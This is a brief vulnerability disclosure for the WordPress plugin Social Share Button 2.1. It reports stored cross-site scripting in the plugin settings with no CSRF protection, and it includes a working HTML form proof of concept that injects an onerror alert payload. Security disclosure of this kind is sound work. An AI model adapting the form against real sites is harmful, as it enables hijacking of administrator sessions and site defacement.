Hello,

Plugin: Social Share Button 2.1 https://wordpress.org/plugins/social-share-button/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=ssb_menu_settings

Vulnerable parameters: ssb_share_content_icon_margin, ssb_social_sites_domain, ssb_social_sites_domain_url, etc..

Example PHP callstack:

/social-share-button/ssb-settings.php:408

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=ssb_menu_settings" />

<input type="text" name="ssb_share_content_icon_margin" value='"><img src=x onerror=alert(1) />' />

<input type="text" name="ssb_hidden" value='Y' />

<input type="submit" name="submit" />

</form>

--